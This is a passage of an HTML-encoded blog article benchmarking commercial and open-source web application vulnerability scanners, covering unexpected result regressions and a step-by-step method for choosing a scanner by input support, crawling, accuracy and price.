&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Price &amp;amp; Feature Comparison of Commercial Scanners&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-commercial-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-commercial-list.html&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Price &amp;amp; Feature Comparison of a Unified List of
Commercial, Free and Open Source Products&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_51&quot;
 o:spid=&quot;_x0000_i1060&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:190.5pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image005.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZpTca2Vy6CdxEAhg5MQtyRta52_9nEbEhu6QB9uZ0FBo9-xIMslZtXAYoEg_xWw7R39qzkjh42qWMUWdgYDzdXK1TAlcbiq4BOkmKQaQafMra6BoE_IrSv0AU_YLNssiPtmzO-0kLa9s/s1600/2%2529+Pricing+POC+Image.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZpTca2Vy6CdxEAhg5MQtyRta52_9nEbEhu6QB9uZ0FBo9-xIMslZtXAYoEg_xWw7R39qzkjh42qWMUWdgYDzdXK1TAlcbiq4BOkmKQaQafMra6BoE_IrSv0AU_YLNssiPtmzO-0kLa9s/s1600/2%2529+Pricing+POC+Image.png&quot; height=&quot;292&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Some of the sections might &lt;b&gt;not be clear&lt;/b&gt; to some of
the readers at this phase, especially since many of them contain new
conclusions and new results, which is why I advise both veterans and newcomers to
read the rest of the article, &lt;b&gt;prior&lt;/b&gt; to analyzing this summary.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;5. SURPRISE SURPRISE&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although on a general basis – the vast majority of product
improve their results from benchmark to benchmark, and this case is not different,
this benchmark also has an above -average amount of conflicting results.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;More than a few tools that got high results in the previous
benchmarks categories, &lt;b&gt;got lesser results&lt;/b&gt; in this one – in the same
categories, although nothing in the test environment has changed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Furthermore, some of the new tests were met with… surprising
difficulty by the &lt;b&gt;vast majority of the tools in the industry&lt;/b&gt;, leading me
to believe that many products in the industry had grown to a size which may be
challenging to maintain in the future years.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The overall problem is related to product testing and maintenance
– the fact that software bugs may cause a variety of crucial features not to function
for long periods of time, without anyone being aware of them.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The cost of the mitigating processes to the vendor (or lack
of to the consumer!) may be very high, and to the fact that it&#39;s very difficult
for the consumer to indentify such issues, especially on a periodic basis, can
have a major effect.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;It&#39;s hard to avoid it… all you need to do is take a look at
a couple of the &quot;new&quot; charts, and even in some of the
&quot;traditional&quot; WAVSEP charts to notice this issue, which I will discuss
in details in some of the sections.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;This phenomenon is something which I will probably analyze
in future publication, and should be a reason to be concerned, especially since
unless certain precautions will be taken, will probably become more severe with
time.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;6. How to Read and Use the Benchmark Results&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The practical reader, the one who wants to make use of the
information provided in this research to his advantage, can use the following
guidelines for interpreting the results, and the following steps to get to
practical decisions:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) Although it&#39;s tempting to look only at the tools at the
top, it&#39;s important to remember that insignificant&lt;b&gt; &lt;/b&gt;differences in
results are just that – &lt;b&gt;insignificant&lt;/b&gt; – and should be treated
accordingly. The benchmark can never cover every single scenario, and &lt;b&gt;a few
percents don&#39;t always make a product better in a category&lt;/b&gt; (although plenty
of percents probably do). I would therefore recommend the reader that evaluates
a tool to figure out whether or not the tool has a &lt;b&gt;good score&lt;/b&gt; in an
assessment and in general, instead of falling to the 100% percent trap. That
being said, a perfect score certainly isn&#39;t bad, so don&#39;t take it the other way
around either.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) When trying to figure which tool you should use, try the
following simple methodology:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;1. &lt;u&gt;Input Vector and Scan Barrier Support&lt;/u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Figure out if the &lt;b&gt;input delivery method&lt;/b&gt; (&lt;b&gt;Test I&lt;/b&gt;)
used by the application or applications you are using is &lt;b&gt;supported&lt;/b&gt; by
the scanners you are evaluating. Do the same for the various &lt;b&gt;security
mechanisms&lt;/b&gt;, &lt;b&gt;technologies&lt;/b&gt; and &lt;b&gt;scan barriers&lt;/b&gt; that are used in
the application (&lt;b&gt;Text X&lt;/b&gt;). The scanner won&#39;t work at all, or will provide
little value if it won&#39;t support those.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;[&lt;b&gt;Note:&lt;/b&gt; pentesters should probably go for a tool that
supports enough of those, as the technological barriers they may encounter
vary, while other organization may use tools that support only what they need]&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;2. &lt;u&gt;Crawling &amp;amp; Input Vector Extraction&lt;/u&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;If you use scanners mainly in a point-and-shoot scenario,
and prefer as much automation as possible, a high WIVET score will be the
second most important feature you should follow. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;[&lt;b&gt;Note:&lt;/b&gt; for the most part, most pentesters can deal
with a reasonable score as well, although a high one will certainly help, while
organizations and QA/DEV departments really need a tool with a high score in
this category – especially in 2014]&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;3. &lt;u&gt;Vulnerability Detection Features and Accuracy&lt;/u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;It&#39;s hard to say what&#39;s more important – so try and keep
those in balance. The more accurate and the more feature rich – the better.
Bear in mind that an accuracy difference of 1%, 5% or even 10% is &lt;b&gt;NOT&lt;/b&gt; necessarily
significant, although larger differences might be.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;4. &lt;u&gt;Price&lt;/u&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;No point in buying a product that can&#39;t run, isn&#39;t automated
enough for you (in case you need it), isn&#39;t accurate at all (will only result
in extra work for you), or doesn&#39;t have enough features to justify the price,
but once all that out of the way, price is your next criterion. Bear in mind
that you can usually negotiate, and that from time to time, prices changes. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;5. &lt;u&gt;All the rest&lt;/u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Some features may be special, such as platform specific
capabilities, result documentation features, complementary features that can
make your life easier, configure your WAF, generate reports for you manager or
get you a free trip to mars.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Some of these features may even tip the scale on the expanse
of other features, but in the long run, try to stick to that order.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Also note that these are general guidelines, and that if
this choice is significant, you might want to consult with an expert to help
you evaluate which tools match your needs.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;7. Test I - Versatility - Input Vector Support&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;As I mentioned in previous posts from &lt;a href=&quot;http://www.infosecisland.com/blogview/21926-A-Step-by-Step-Guide-for-Choosing-the-Best-Scanner.html&quot;&gt;2012&lt;/a&gt;,
after investigating the field of DAST for the past five years, I consider the
scanner&#39;s &lt;b&gt;support&lt;/b&gt; for the tested &lt;b&gt;application input delivery method&lt;/b&gt;
to be the &lt;b&gt;single MOST significant aspect &lt;/b&gt;in the selection process of any
scanner.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
